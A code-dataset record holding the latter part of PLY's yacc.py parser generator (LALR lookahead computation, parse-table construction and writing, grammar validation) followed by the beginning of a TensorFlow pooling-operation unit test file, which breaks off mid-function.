# ----------------------------------------------------------------------------- def reads_relation(self,C, trans, empty): # Look for empty transitions rel = [] state, N = trans g = self.lr0_goto(C[state],N) j = self.lr0_cidhash.get(id(g),-1) for p in g: if p.lr_index < p.len - 1: a = p.prod[p.lr_index + 1] if a in empty: rel.append((j,a)) return rel # ----------------------------------------------------------------------------- # compute_lookback_includes() # # Determines the lookback and includes relations # # LOOKBACK: # # This relation is determined by running the LR(0) state machine forward. # For example, starting with a production "N : . A B C", we run it forward # to obtain "N : A B C ." We then build a relationship between this final # state and the starting state. These relationships are stored in a dictionary # lookdict. # # INCLUDES: # # Computes the INCLUDE() relation (p,A) INCLUDES (p',B). # # This relation is used to determine non-terminal transitions that occur # inside of other non-terminal transition states. (p,A) INCLUDES (p', B) # if the following holds: # # B -> LAT, where T -> epsilon and p' -L-> p # # L is essentially a prefix (which may be empty), T is a suffix that must be # able to derive an empty string. State p' must lead to state p with the string L. # # ----------------------------------------------------------------------------- def compute_lookback_includes(self,C,trans,nullable): lookdict = {} # Dictionary of lookback relations includedict = {} # Dictionary of include relations # Make a dictionary of non-terminal transitions dtrans = {} for t in trans: dtrans[t] = 1 # Loop over all transitions and compute lookbacks and includes for state,N in trans: lookb = [] includes = [] for p in C[state]: if p.name != N: continue # Okay, we have a name match. We now follow the production all the way # through the state machine until we get the . on the right hand side lr_index = p.lr_index j = state while lr_index < p.len - 1: lr_index = lr_index + 1 t = p.prod[lr_index] # Check to see if this symbol and state are a non-terminal transition if (j,t) in dtrans: # Yes. Okay, there is some chance that this is an includes relation # the only way to know for certain is whether the rest of the # production derives empty li = lr_index + 1 while li < p.len: if p.prod[li] in self.grammar.Terminals: break # No forget it if not p.prod[li] in nullable: break li = li + 1 else: # Appears to be a relation between (j,t) and (state,N) includes.append((j,t)) g = self.lr0_goto(C[j],t) # Go to next set j = self.lr0_cidhash.get(id(g),-1) # Go to next state # When we get here, j is the final state, now we have to locate the production for r in C[j]: if r.name != p.name: continue if r.len != p.len: continue i = 0 # This look is comparing a production ". A B C" with "A B C ." while i < r.lr_index: if r.prod[i] != p.prod[i+1]: break i = i + 1 else: lookb.append((j,r)) for i in includes: if not i in includedict: includedict[i] = [] includedict[i].append((state,N)) lookdict[(state,N)] = lookb return lookdict,includedict # ----------------------------------------------------------------------------- # compute_read_sets() # # Given a set of LR(0) items, this function computes the read sets. # # Inputs: C = Set of LR(0) items # ntrans = Set of nonterminal transitions # nullable = Set of empty transitions # # Returns a set containing the read sets # ----------------------------------------------------------------------------- def compute_read_sets(self,C, ntrans, nullable): FP = lambda x: self.dr_relation(C,x,nullable) R = lambda x: self.reads_relation(C,x,nullable) F = digraph(ntrans,R,FP) return F # ----------------------------------------------------------------------------- # compute_follow_sets() # # Given a set of LR(0) items, a set of non-terminal transitions, a readset, # and an include set, this function computes the follow sets # # Follow(p,A) = Read(p,A) U U {Follow(p',B) | (p,A) INCLUDES (p',B)} # # Inputs: # ntrans = Set of nonterminal transitions # readsets = Readset (previously computed) # inclsets = Include sets (previously computed) # # Returns a set containing the follow sets # ----------------------------------------------------------------------------- def compute_follow_sets(self,ntrans,readsets,inclsets): FP = lambda x: readsets[x] R = lambda x: inclsets.get(x,[]) F = digraph(ntrans,R,FP) return F # ----------------------------------------------------------------------------- # add_lookaheads() # # Attaches the lookahead symbols to grammar rules. # # Inputs: lookbacks - Set of lookback relations # followset - Computed follow set # # This function directly attaches the lookaheads to productions contained # in the lookbacks set # ----------------------------------------------------------------------------- def add_lookaheads(self,lookbacks,followset): for trans,lb in lookbacks.items(): # Loop over productions in lookback for state,p in lb: if not state in p.lookaheads: p.lookaheads[state] = [] f = followset.get(trans,[]) for a in f: if a not in p.lookaheads[state]: p.lookaheads[state].append(a) # ----------------------------------------------------------------------------- # add_lalr_lookaheads() # # This function does all of the work of adding lookahead information for use # with LALR parsing # ----------------------------------------------------------------------------- def add_lalr_lookaheads(self,C): # Determine all of the nullable nonterminals nullable = self.compute_nullable_nonterminals() # Find all non-terminal transitions trans = self.find_nonterminal_transitions(C) # Compute read sets readsets = self.compute_read_sets(C,trans,nullable) # Compute lookback/includes relations lookd, included = self.compute_lookback_includes(C,trans,nullable) # Compute LALR FOLLOW sets followsets = self.compute_follow_sets(trans,readsets,included) # Add all of the lookaheads self.add_lookaheads(lookd,followsets) # ----------------------------------------------------------------------------- # lr_parse_table() # # This function constructs the parse tables for SLR or LALR # ----------------------------------------------------------------------------- def lr_parse_table(self): Productions = self.grammar.Productions Precedence = self.grammar.Precedence goto = self.lr_goto # Goto array action = self.lr_action # Action array log = self.log # Logger for output actionp = { } # Action production array (temporary) log.info("Parsing method: %s", self.lr_method) # Step 1: Construct C = { I0, I1, ... IN}, collection of LR(0) items # This determines the number of states C = self.lr0_items() if self.lr_method == 'LALR': self.add_lalr_lookaheads(C) # Build the parser table, state by state st = 0 for I in C: # Loop over each production in I actlist = [ ] # List of actions st_action = { } st_actionp = { } st_goto = { } log.info("") log.info("state %d", st) log.info("") for p in I: log.info(" (%d) %s", p.number, str(p)) log.info("") for p in I: if p.len == p.lr_index + 1: if p.name == "S'": # Start symbol. Accept! st_action["$end"] = 0 st_actionp["$end"] = p else: # We are at the end of a production. Reduce! if self.lr_method == 'LALR': laheads = p.lookaheads[st] else: laheads = self.grammar.Follow[p.name] for a in laheads: actlist.append((a,p,"reduce using rule %d (%s)" % (p.number,p))) r = st_action.get(a,None) if r is not None: # Whoa. Have a shift/reduce or reduce/reduce conflict if r > 0: # Need to decide on shift or reduce here # By default we favor shifting. Need to add # some precedence rules here. sprec,slevel = Productions[st_actionp[a].number].prec rprec,rlevel = Precedence.get(a,('right',0)) if (slevel < rlevel) or ((slevel == rlevel) and (rprec == 'left')): # We really need to reduce here. st_action[a] = -p.number st_actionp[a] = p if not slevel and not rlevel: log.info(" ! shift/reduce conflict for %s resolved as reduce",a) self.sr_conflicts.append((st,a,'reduce')) Productions[p.number].reduced += 1 elif (slevel == rlevel) and (rprec == 'nonassoc'): st_action[a] = None else: # Hmmm. Guess we'll keep the shift if not rlevel: log.info(" ! shift/reduce conflict for %s resolved as shift",a) self.sr_conflicts.append((st,a,'shift')) elif r < 0: # Reduce/reduce conflict. In this case, we favor the rule # that was defined first in the grammar file oldp = Productions[-r] pp = Productions[p.number] if oldp.line > pp.line: st_action[a] = -p.number st_actionp[a] = p chosenp,rejectp = pp,oldp Productions[p.number].reduced += 1 Productions[oldp.number].reduced -= 1 else: chosenp,rejectp = oldp,pp self.rr_conflicts.append((st,chosenp,rejectp)) log.info(" ! reduce/reduce conflict for %s resolved using rule %d (%s)", a,st_actionp[a].number, st_actionp[a]) else: raise LALRError("Unknown conflict in state %d" % st) else: st_action[a] = -p.number st_actionp[a] = p Productions[p.number].reduced += 1 else: i = p.lr_index a = p.prod[i+1] # Get symbol right after the "." if a in self.grammar.Terminals: g = self.lr0_goto(I,a) j = self.lr0_cidhash.get(id(g),-1) if j >= 0: # We are in a shift state actlist.append((a,p,"shift and go to state %d" % j)) r = st_action.get(a,None) if r is not None: # Whoa have a shift/reduce or shift/shift conflict if r > 0: if r != j: raise LALRError("Shift/shift conflict in state %d" % st) elif r < 0: # Do a precedence check. # - if precedence of reduce rule is higher, we reduce. # - if precedence of reduce is same and left assoc, we reduce. # - otherwise we shift rprec,rlevel = Productions[st_actionp[a].number].prec sprec,slevel = Precedence.get(a,('right',0)) if (slevel > rlevel) or ((slevel == rlevel) and (rprec == 'right')): # We decide to shift here... highest precedence to shift Productions[st_actionp[a].number].reduced -= 1 st_action[a] = j st_actionp[a] = p if not rlevel: log.info(" ! shift/reduce conflict for %s resolved as shift",a) self.sr_conflicts.append((st,a,'shift')) elif (slevel == rlevel) and (rprec == 'nonassoc'): st_action[a] = None else: # Hmmm. Guess we'll keep the reduce if not slevel and not rlevel: log.info(" ! shift/reduce conflict for %s resolved as reduce",a) self.sr_conflicts.append((st,a,'reduce')) else: raise LALRError("Unknown conflict in state %d" % st) else: st_action[a] = j st_actionp[a] = p # Print the actions associated with each terminal _actprint = { } for a,p,m in actlist: if a in st_action: if p is st_actionp[a]: log.info(" %-15s %s",a,m) _actprint[(a,m)] = 1 log.info("") # Print the actions that were not used. (debugging) not_used = 0 for a,p,m in actlist: if a in st_action: if p is not st_actionp[a]: if not (a,m) in _actprint: log.debug(" ! %-15s [ %s ]",a,m) not_used = 1 _actprint[(a,m)] = 1 if not_used: log.debug("") # Construct the goto table for this state nkeys = { } for ii in I: for s in ii.usyms: if s in self.grammar.Nonterminals: nkeys[s] = None for n in nkeys: g = self.lr0_goto(I,n) j = self.lr0_cidhash.get(id(g),-1) if j >= 0: st_goto[n] = j log.info(" %-30s shift and go to state %d",n,j) action[st] = st_action actionp[st] = st_actionp goto[st] = st_goto st += 1 # ----------------------------------------------------------------------------- # write() # # This function writes the LR parsing tables to a file # ----------------------------------------------------------------------------- def write_table(self,modulename,outputdir='',signature=""): basemodulename = modulename.split(".")[-1] filename = os.path.join(outputdir,basemodulename) + ".py" try: f = open(filename,"w") f.write(""" # %s # This file is automatically generated. Do not edit. _tabversion = %r _lr_method = %r _lr_signature = %r """ % (filename, __tabversion__, self.lr_method, signature)) # Change smaller to 0 to go back to original tables smaller = 1 # Factor out names to try and make smaller if smaller: items = { } for s,nd in self.lr_action.items(): for name,v in nd.items(): i = items.get(name) if not i: i = ([],[]) items[name] = i i[0].append(s) i[1].append(v) f.write("\n_lr_action_items = {") for k,v in items.items(): f.write("%r:([" % k) for i in v[0]: f.write("%r," % i) f.write("],[") for i in v[1]: f.write("%r," % i) f.write("]),") f.write("}\n") f.write(""" _lr_action = { } for _k, _v in _lr_action_items.items(): for _x,_y in zip(_v[0],_v[1]): if not _x in _lr_action: _lr_action[_x] = { } _lr_action[_x][_k] = _y del _lr_action_items """) else: f.write("\n_lr_action = { "); for k,v in self.lr_action.items(): f.write("(%r,%r):%r," % (k[0],k[1],v)) f.write("}\n"); if smaller: # Factor out names to try and make smaller items = { } for s,nd in self.lr_goto.items(): for name,v in nd.items(): i = items.get(name) if not i: i = ([],[]) items[name] = i i[0].append(s) i[1].append(v) f.write("\n_lr_goto_items = {") for k,v in items.items(): f.write("%r:([" % k) for i in v[0]: f.write("%r," % i) f.write("],[") for i in v[1]: f.write("%r," % i) f.write("]),") f.write("}\n") f.write(""" _lr_goto = { } for _k, _v in _lr_goto_items.items(): for _x,_y in zip(_v[0],_v[1]): if not _x in _lr_goto: _lr_goto[_x] = { } _lr_goto[_x][_k] = _y del _lr_goto_items """) else: f.write("\n_lr_goto = { "); for k,v in self.lr_goto.items(): f.write("(%r,%r):%r," % (k[0],k[1],v)) f.write("}\n"); # Write production table f.write("_lr_productions = [\n") for p in self.lr_productions: if p.func: f.write(" (%r,%r,%d,%r,%r,%d),\n" % (p.str,p.name, p.len, p.func,p.file,p.line)) else: f.write(" (%r,%r,%d,None,None,None),\n" % (str(p),p.name, p.len)) f.write("]\n") f.close() except IOError: e = sys.exc_info()[1] sys.stderr.write("Unable to create '%s'\n" % filename) sys.stderr.write(str(e)+"\n") return # ----------------------------------------------------------------------------- # pickle_table() # # This function pickles the LR parsing tables to a supplied file object # ----------------------------------------------------------------------------- def pickle_table(self,filename,signature=""): try: import cPickle as pickle except ImportError: import pickle outf = open(filename,"wb") pickle.dump(__tabversion__,outf,pickle_protocol) pickle.dump(self.lr_method,outf,pickle_protocol) pickle.dump(signature,outf,pickle_protocol) pickle.dump(self.lr_action,outf,pickle_protocol) pickle.dump(self.lr_goto,outf,pickle_protocol) outp = [] for p in self.lr_productions: if p.func: outp.append((p.str,p.name, p.len, p.func,p.file,p.line)) else: outp.append((str(p),p.name,p.len,None,None,None)) pickle.dump(outp,outf,pickle_protocol) outf.close() # ----------------------------------------------------------------------------- # === INTROSPECTION === # # The following functions and classes are used to implement the PLY # introspection features followed by the yacc() function itself. # ----------------------------------------------------------------------------- # ----------------------------------------------------------------------------- # get_caller_module_dict() # # This function returns a dictionary containing all of the symbols defined within # a caller further down the call stack. This is used to get the environment # associated with the yacc() call if none was provided. # ----------------------------------------------------------------------------- def get_caller_module_dict(levels): try: raise RuntimeError except RuntimeError: e,b,t = sys.exc_info() f = t.tb_frame while levels > 0: f = f.f_back levels -= 1 ldict = f.f_globals.copy() if f.f_globals != f.f_locals: ldict.update(f.f_locals) return ldict # ----------------------------------------------------------------------------- # parse_grammar() # # This takes a raw grammar rule string and parses it into production data # ----------------------------------------------------------------------------- def parse_grammar(doc,file,line): grammar = [] # Split the doc string into lines pstrings = doc.splitlines() lastp = None dline = line for ps in pstrings: dline += 1 p = ps.split() if not p: continue try: if p[0] == '|': # This is a continuation of a previous rule if not lastp: raise SyntaxError("%s:%d: Misplaced '|'" % (file,dline)) prodname = lastp syms = p[1:] else: prodname = p[0] lastp = prodname syms = p[2:] assign = p[1] if assign != ':' and assign != '::=': raise SyntaxError("%s:%d: Syntax error. Expected ':'" % (file,dline)) grammar.append((file,dline,prodname,syms)) except SyntaxError: raise except Exception: raise SyntaxError("%s:%d: Syntax error in rule '%s'" % (file,dline,ps.strip())) return grammar # ----------------------------------------------------------------------------- # ParserReflect() # # This class represents information extracted for building a parser including # start symbol, error function, tokens, precedence list, action functions, # etc. # ----------------------------------------------------------------------------- class ParserReflect(object): def __init__(self,pdict,log=None): self.pdict = pdict self.start = None self.error_func = None self.tokens = None self.files = {} self.grammar = [] self.error = 0 if log is None: self.log = PlyLogger(sys.stderr) else: self.log = log # Get all of the basic information def get_all(self): self.get_start() self.get_error_func() self.get_tokens() self.get_precedence() self.get_pfunctions() # Validate all of the information def validate_all(self): self.validate_start() self.validate_error_func() self.validate_tokens() self.validate_precedence() self.validate_pfunctions() self.validate_files() return self.error # Compute a signature over the grammar def signature(self): try: from hashlib import md5 except ImportError: from md5 import md5 try: sig = md5() if self.start: sig.update(self.start.encode('latin-1')) if self.prec: sig.update("".join(["".join(p) for p in self.prec]).encode('latin-1')) if self.tokens: sig.update(" ".join(self.tokens).encode('latin-1')) for f in self.pfuncs: if f[3]: sig.update(f[3].encode('latin-1')) except (TypeError,ValueError): pass return sig.digest() # ----------------------------------------------------------------------------- # validate_file() # # This method checks to see if there are duplicated p_rulename() functions # in the parser module file. Without this function, it is really easy for # users to make mistakes by cutting and pasting code fragments (and it's a real # bugger to try and figure out why the resulting parser doesn't work). Therefore, # we just do a little regular expression pattern matching of def statements # to try and detect duplicates. # ----------------------------------------------------------------------------- def validate_files(self): # Match def p_funcname( fre = re.compile(r'\s*def\s+(p_[a-zA-Z_0-9]*)\(') for filename in self.files.keys(): base,ext = os.path.splitext(filename) if ext != '.py': return 1 # No idea. Assume it's okay. try: f = open(filename) lines = f.readlines() f.close() except IOError: continue counthash = { } for linen,l in enumerate(lines): linen += 1 m = fre.match(l) if m: name = m.group(1) prev = counthash.get(name) if not prev: counthash[name] = linen else: self.log.warning("%s:%d: Function %s redefined. Previously defined on line %d", filename,linen,name,prev) # Get the start symbol def get_start(self): self.start = self.pdict.get('start') # Validate the start symbol def validate_start(self): if self.start is not None: if not isinstance(self.start,str): self.log.error("'start' must be a string") # Look for error handler def get_error_func(self): self.error_func = self.pdict.get('p_error') # Validate the error function def validate_error_func(self): if self.error_func: if isinstance(self.error_func,types.FunctionType): ismethod = 0 elif isinstance(self.error_func, types.MethodType): ismethod = 1 else: self.log.error("'p_error' defined, but is not a function or method") self.error = 1 return eline = func_code(self.error_func).co_firstlineno efile = func_code(self.error_func).co_filename self.files[efile] = 1 if (func_code(self.error_func).co_argcount != 1+ismethod): self.log.error("%s:%d: p_error() requires 1 argument",efile,eline) self.error = 1 # Get the tokens map def get_tokens(self): tokens = self.pdict.get("tokens",None) if not tokens: self.log.error("No token list is defined") self.error = 1 return if not isinstance(tokens,(list, tuple)): self.log.error("tokens must be a list or tuple") self.error = 1 return if not tokens: self.log.error("tokens is empty") self.error = 1 return self.tokens = tokens # Validate the tokens def validate_tokens(self): # Validate the tokens. if 'error' in self.tokens: self.log.error("Illegal token name 'error'. Is a reserved word") self.error = 1 return terminals = {} for n in self.tokens: if n in terminals: self.log.warning("Token '%s' multiply defined", n) terminals[n] = 1 # Get the precedence map (if any) def get_precedence(self): self.prec = self.pdict.get("precedence",None) # Validate and parse the precedence map def validate_precedence(self): preclist = [] if self.prec: if not isinstance(self.prec,(list,tuple)): self.log.error("precedence must be a list or tuple") self.error = 1 return for level,p in enumerate(self.prec): if not isinstance(p,(list,tuple)): self.log.error("Bad precedence table") self.error = 1 return if len(p) < 2: self.log.error("Malformed precedence entry %s. Must be (assoc, term, ..., term)",p) self.error = 1 return assoc = p[0] if not isinstance(assoc,str): self.log.error("precedence associativity must be a string") self.error = 1 return for term in p[1:]: if not isinstance(term,str): self.log.error("precedence items must be strings") self.error = 1 return preclist.append((term,assoc,level+1)) self.preclist = preclist # Get all p_functions from the grammar def get_pfunctions(self): p_functions = [] for name, item in self.pdict.items(): if name[:2] != 'p_': continue if name == 'p_error': continue if isinstance(item,(types.FunctionType,types.MethodType)): line = func_code(item).co_firstlineno file = func_code(item).co_filename p_functions.append((line,file,name,item.__doc__)) # Sort all of the actions by line number p_functions.sort() self.pfuncs = p_functions # Validate all of the p_functions def validate_pfunctions(self): grammar = [] # Check for non-empty symbols if len(self.pfuncs) == 0: self.log.error("no rules of the form p_rulename are defined") self.error = 1 return for line, file, name, doc in self.pfuncs: func = self.pdict[name] if isinstance(func, types.MethodType): reqargs = 2 else: reqargs = 1 if func_code(func).co_argcount > reqargs: self.log.error("%s:%d: Rule '%s' has too many arguments",file,line,func.__name__) self.error = 1 elif func_code(func).co_argcount < reqargs: self.log.error("%s:%d: Rule '%s' requires an argument",file,line,func.__name__) self.error = 1 elif not func.__doc__: self.log.warning("%s:%d: No documentation string specified in function '%s' (ignored)",file,line,func.__name__) else: try: parsed_g = parse_grammar(doc,file,line) for g in parsed_g: grammar.append((name, g)) except SyntaxError: e = sys.exc_info()[1] self.log.error(str(e)) self.error = 1 # Looks like a valid grammar rule # Mark the file in which defined. self.files[file] = 1 # Secondary validation step that looks for p_ definitions that are not functions # or functions that look like they might be grammar rules. for n,v in self.pdict.items(): if n[0:2] == 'p_' and isinstance(v, (types.FunctionType, types.MethodType)): continue if n[0:2] == 't_': continue if n[0:2] == 'p_' and n != 'p_error': self.log.warning("'%s' not defined as a function", n) if ((isinstance(v,types.FunctionType) and func_code(v).co_argcount == 1) or (isinstance(v,types.MethodType) and func_code(v).co_argcount == 2)): try: doc = v.__doc__.split(" ") if doc[1] == ':': self.log.warning("%s:%d: Possible grammar rule '%s' defined without p_ prefix", func_code(v).co_filename, func_code(v).co_firstlineno,n) except Exception: pass self.grammar = grammar # ----------------------------------------------------------------------------- # yacc(module) # # Build a parser # ----------------------------------------------------------------------------- def yacc(method='LALR', debug=yaccdebug, module=None, tabmodule=tab_module, start=None, check_recursion=1, optimize=0, write_tables=1, debugfile=debug_file,outputdir='', debuglog=None, errorlog = None, picklefile=None): global parse # Reference to the parsing method of the last built parser # If pickling is enabled, table files are not created if picklefile: write_tables = 0 if errorlog is None: errorlog = PlyLogger(sys.stderr) # Get the module dictionary used for the parser if module: _items = [(k,getattr(module,k)) for k in dir(module)] pdict = dict(_items) else: pdict = get_caller_module_dict(2) # Collect parser information from the dictionary pinfo = ParserReflect(pdict,log=errorlog) pinfo.get_all() if pinfo.error: raise YaccError("Unable to build parser") # Check signature against table files (if any) signature = pinfo.signature() # Read the tables try: lr = LRTable() if picklefile: read_signature = lr.read_pickle(picklefile) else: read_signature = lr.read_table(tabmodule) if optimize or (read_signature == signature): try: lr.bind_callables(pinfo.pdict) parser = LRParser(lr,pinfo.error_func) parse = parser.parse return parser except Exception: e = sys.exc_info()[1] errorlog.warning("There was a problem loading the table file: %s", repr(e)) except VersionError: e = sys.exc_info() errorlog.warning(str(e)) except Exception: pass if debuglog is None: if debug: debuglog = PlyLogger(open(debugfile,"w")) else: debuglog = NullLogger() debuglog.info("Created by PLY version %s (http://www.dabeaz.com/ply)", __version__) errors = 0 # Validate the parser information if pinfo.validate_all(): raise YaccError("Unable to build parser") if not pinfo.error_func: errorlog.warning("no p_error() function is defined") # Create a grammar object grammar = Grammar(pinfo.tokens) # Set precedence level for terminals for term, assoc, level in pinfo.preclist: try: grammar.set_precedence(term,assoc,level) except GrammarError: e = sys.exc_info()[1] errorlog.warning("%s",str(e)) # Add productions to the grammar for funcname, gram in pinfo.grammar: file, line, prodname, syms = gram try: grammar.add_production(prodname,syms,funcname,file,line) except GrammarError: e = sys.exc_info()[1] errorlog.error("%s",str(e)) errors = 1 # Set the grammar start symbols try: if start is None: grammar.set_start(pinfo.start) else: grammar.set_start(start) except GrammarError: e = sys.exc_info()[1] errorlog.error(str(e)) errors = 1 if errors: raise YaccError("Unable to build parser") # Verify the grammar structure undefined_symbols = grammar.undefined_symbols() for sym, prod in undefined_symbols: errorlog.error("%s:%d: Symbol '%s' used, but not defined as a token or a rule",prod.file,prod.line,sym) errors = 1 unused_terminals = grammar.unused_terminals() if unused_terminals: debuglog.info("") debuglog.info("Unused terminals:") debuglog.info("") for term in unused_terminals: errorlog.warning("Token '%s' defined, but not used", term) debuglog.info(" %s", term) # Print out all productions to the debug log if debug: debuglog.info("") debuglog.info("Grammar") debuglog.info("") for n,p in enumerate(grammar.Productions): debuglog.info("Rule %-5d %s", n, p) # Find unused non-terminals unused_rules = grammar.unused_rules() for prod in unused_rules: errorlog.warning("%s:%d: Rule '%s' defined, but not used", prod.file, prod.line, prod.name) if len(unused_terminals) == 1: errorlog.warning("There is 1 unused token") if len(unused_terminals) > 1: errorlog.warning("There are %d unused tokens", len(unused_terminals)) if len(unused_rules) == 1: errorlog.warning("There is 1 unused rule") if len(unused_rules) > 1: errorlog.warning("There are %d unused rules", len(unused_rules)) if debug: debuglog.info("") debuglog.info("Terminals, with rules where they appear") debuglog.info("") terms = list(grammar.Terminals) terms.sort() for term in terms: debuglog.info("%-20s : %s", term, " ".join([str(s) for s in grammar.Terminals[term]])) debuglog.info("") debuglog.info("Nonterminals, with rules where they appear") debuglog.info("") nonterms = list(grammar.Nonterminals) nonterms.sort() for nonterm in nonterms: debuglog.info("%-20s : %s", nonterm, " ".join([str(s) for s in grammar.Nonterminals[nonterm]])) debuglog.info("") if check_recursion: unreachable = grammar.find_unreachable() for u in unreachable: errorlog.warning("Symbol '%s' is unreachable",u) infinite = grammar.infinite_cycles() for inf in infinite: errorlog.error("Infinite recursion detected for symbol '%s'", inf) errors = 1 unused_prec = grammar.unused_precedence() for term, assoc in unused_prec: errorlog.error("Precedence rule '%s' defined for unknown symbol '%s'", assoc, term) errors = 1 if errors: raise YaccError("Unable to build parser") # Run the LRGeneratedTable on the grammar if debug: errorlog.debug("Generating %s tables", method) lr = LRGeneratedTable(grammar,method,debuglog) if debug: num_sr = len(lr.sr_conflicts) # Report shift/reduce and reduce/reduce conflicts if num_sr == 1: errorlog.warning("1 shift/reduce conflict") elif num_sr > 1: errorlog.warning("%d shift/reduce conflicts", num_sr) num_rr = len(lr.rr_conflicts) if num_rr == 1: errorlog.warning("1 reduce/reduce conflict") elif num_rr > 1: errorlog.warning("%d reduce/reduce conflicts", num_rr) # Write out conflicts to the output file if debug and (lr.sr_conflicts or lr.rr_conflicts): debuglog.warning("") debuglog.warning("Conflicts:") debuglog.warning("") for state, tok, resolution in lr.sr_conflicts: debuglog.warning("shift/reduce conflict for %s in state %d resolved as %s", tok, state, resolution) already_reported = {} for state, rule, rejected in lr.rr_conflicts: if (state,id(rule),id(rejected)) in already_reported: continue debuglog.warning("reduce/reduce conflict in state %d resolved using rule (%s)", state, rule) debuglog.warning("rejected rule (%s) in state %d", rejected,state) errorlog.warning("reduce/reduce conflict in state %d resolved using rule (%s)", state, rule) errorlog.warning("rejected rule (%s) in state %d", rejected, state) already_reported[state,id(rule),id(rejected)] = 1 warned_never = [] for state, rule, rejected in lr.rr_conflicts: if not rejected.reduced and (rejected not in warned_never): debuglog.warning("Rule (%s) is never reduced", rejected) errorlog.warning("Rule (%s) is never reduced", rejected) warned_never.append(rejected) # Write the table file if requested if write_tables: lr.write_table(tabmodule,outputdir,signature) # Write a pickled version of the tables if picklefile: lr.pickle_table(picklefile,signature) # Build the parser lr.bind_callables(pinfo.pdict) parser = LRParser(lr,pinfo.error_func) parse = parser.parse return parser
mpl-2.0
brendandburns/tensorflow
tensorflow/python/kernel_tests/pooling_ops_test.py
5
36678
"""Functional tests for pooling operations.""" from __future__ import print_function import tensorflow.python.platform import numpy as np import tensorflow as tf from tensorflow.python.kernel_tests import gradient_checker as gc from tensorflow.python.ops import gen_nn_ops def GetInceptionMaxPoolShapes(): """Iterator for some of the max pool ops in the Inception 2015 model. Yields: Tuple (name, input_size, filter_size, out_size, strides, padding) """ names = ["maxpool2", "maxpool3", "maxpool4", "maxpool5"] input_sizes = [[32, 71, 71, 192], [32, 35, 35, 288], [32, 17, 17, 1248], [32, 8, 8, 2048]] filter_sizes = [[1, 3, 3, 1], [1, 3, 3, 1], [1, 3, 3, 1], [1, 3, 3, 1]] output_sizes = [[32, 35, 35, 192], [32, 17, 17, 288], [32, 8, 8, 1248], [32, 8, 8, 2048]] strides = [[1, 2, 2, 1], [1, 2, 2, 1], [1, 2, 2, 1], [1, 1, 1, 1]] paddings = ["VALID", "VALID", "VALID", "SAME"] for n, i, f, o, s, p in zip(names, input_sizes, filter_sizes, output_sizes, strides, paddings): yield n, i, f, o, s, p class PoolingTest(tf.test.TestCase): def _VerifyValues(self, pool_func, input_sizes, ksize, strides, padding, expected, use_gpu): """Verifies the output values of the pooling function. Args: pool_func: Function to be called, co.MaxPool, co.AvgPool, or the Lua version. input_sizes: Input tensor dimensions. ksize: The kernel size dimensions strides: The stride dimensions padding: Padding type. expected: An array containing the expected operation outputs. use_gpu: Whether we are running on GPU. """ total_size = 1 for s in input_sizes: total_size *= s # Initializes the input tensor with array containing incrementing # numbers from 1. x = [f * 1.0 for f in range(1, total_size + 1)] with self.test_session(use_gpu=use_gpu) as sess: t = tf.constant(x, shape=input_sizes) t = pool_func(t, ksize=ksize, strides=strides, padding=padding) actual = t.eval() self.assertAllClose(expected, actual.flatten()) self.assertShapeEqual(actual, t) def _testAvgPoolValidPadding(self, use_gpu): expected_output = [7.0, 8.0, 9.0] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 3, 3, 3], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="VALID", expected=expected_output, use_gpu=use_gpu) def _testAvgPoolSamePadding(self, use_gpu): expected_output = [8.5, 9.5, 10.5, 14.5, 15.5, 16.5] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 2, 4, 3], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def _testAvgPoolSamePaddingNonSquareWindow(self, use_gpu): # input is: # [1.0, 2.0 # 3.0 4.0] # # Window of [x, x] should do: # [avg(1.0, 2.0), avg(2.0, padded0), # avg(3.0, 4.0), avg(4.0, padded0)] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 2, 2, 1], ksize=[1, 1, 2, 1], strides=[1, 1, 1, 1], padding="SAME", expected=[1.5, 2.0, 3.5, 4.0], use_gpu=use_gpu) # Window of [x, # x] should do: # [avg(1.0, 3.0), avg(2.0, 4.0) # avg(3.0, padded0), avg(4.0, padded0)] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 2, 2, 1], ksize=[1, 2, 1, 1], strides=[1, 1, 1, 1], padding="SAME", expected=[2.0, 3.0, 3.0, 4.0], use_gpu=use_gpu) def _testAvgPoolSamePaddingNonSquareWindowMultiBatch(self, use_gpu): self._VerifyValues(tf.nn.avg_pool, input_sizes=[2, 2, 2, 2], ksize=[1, 1, 2, 1], strides=[1, 1, 1, 1], padding="SAME", expected=[2.0, 3.0, 3.0, 4.0, 6.0, 7.0, 7.0, 8.0, 10.0, 11.0, 11.0, 12.0, 14.0, 15.0, 15.0, 16.0], use_gpu=use_gpu) self._VerifyValues(tf.nn.avg_pool, input_sizes=[2, 2, 2, 2], ksize=[1, 2, 1, 1], strides=[1, 1, 1, 1], padding="SAME", expected=[3.0, 4.0, 5.0, 6.0, 5.0, 6.0, 7.0, 8.0, 11.0, 12.0, 13.0, 14.0, 13.0, 14.0, 15.0, 16.0], use_gpu=use_gpu) def _testAvgPoolValidPaddingUnevenStride(self, use_gpu): self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 3, 3, 3], ksize=[1, 2, 2, 1], strides=[1, 1, 2, 1], padding="VALID", expected=[7.0, 8.0, 9.0, 16.0, 17.0, 18.0], use_gpu=use_gpu) self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 3, 3, 3], ksize=[1, 2, 2, 1], strides=[1, 2, 1, 1], padding="VALID", expected=[7.0, 8.0, 9.0, 10.0, 11.0, 12.0], use_gpu=use_gpu) def _testAvgPoolSamePadding4(self, use_gpu): expected_output = [11.0, 12.0, 13.0, 14.0, 19.0, 20.0, 21.0, 22.0, 43.0, 44.0, 45.0, 46.0, 51.0, 52.0, 53.0, 54.0] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 4, 4, 4], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def _testAvgPoolSamePaddingPacket4(self, use_gpu): expected_output = [21.0, 22.0, 23.0, 24.0, 27.0, 28.0, 29.0, 30.0, 45.0, 46.0, 47.0, 48.0, 51.0, 52.0, 53.0, 54.0] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 4, 4, 4], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def _testAvgPoolSamePaddingPacket8(self, use_gpu): 